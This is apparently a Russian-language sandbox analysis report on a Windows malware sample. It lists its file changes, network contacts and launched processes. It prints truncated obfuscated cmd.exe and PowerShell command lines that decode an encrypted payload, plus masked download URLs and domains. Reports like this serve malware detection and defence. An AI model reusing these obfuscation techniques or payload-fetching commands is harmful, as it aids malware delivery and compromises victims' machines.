Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wSXzbzjpHXWtX uOwDuOAXPbkOfnrwziosqMBV MPfhTYWauQWA & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qivlDksYcLwoIPw%=hvrwbcciLLj&&set %cXlkCjCwdz%=p&&set %qcGCvmz...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\195639.exe
Удаляет следующие файлы
- C:\users\public\195639.exe
Сетевая активность
Подключается к
- 'da###.com.tw':80
- 'ma####concept.de':80
- 'vi####bella-vita.de':443
- 'ma###ward.co.uk':80
- 'ha###one.com':80
- 'ne#####rience.com.br':80
- 'ne#####rience.com.br':443
TCP
Запросы HTTP GET
- http://da###.com.tw/image/product/pic_s/ChNrOH/
- http://ma####concept.de/SRoa0I/
- http://ma###ward.co.uk/XqP7/
- http://ha###one.com/Eo225K/
- http://ha###one.com/Eo225K/forum.php
- http://ne#####rience.com.br/dBUPNN/
Другие
- 'vi####bella-vita.de':443
- 'ne#####rience.com.br':443
UDP
- DNS ASK da###.com.tw
- DNS ASK ma####concept.de
- DNS ASK vi####bella-vita.de
- DNS ASK ma###ward.co.uk
- DNS ASK ha###one.com
- DNS ASK ne#####rience.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wSXzbzjpHXWtX uOwDuOAXPbkOfnrwziosqMBV MPfhTYWauQWA & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qivlDksYcLwoIPw%=hvrwbcciLLj&&set %cXlkCjCwdz%=p&&set %qcGCvmz...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( [RunTiMe.IntErOPsERVIceS.MarsHaL]::PTRtostringAUto([RuNTimE.inTerOPsErviCeS.maRShAl]::SECUreSTRINgToBstr( $('76492d1116743f0423413b16050a5345MgB8ADgAQgBEAFMAMAAyAHgAUAB4AEYAOQA0AFMAdABaAEEAU...
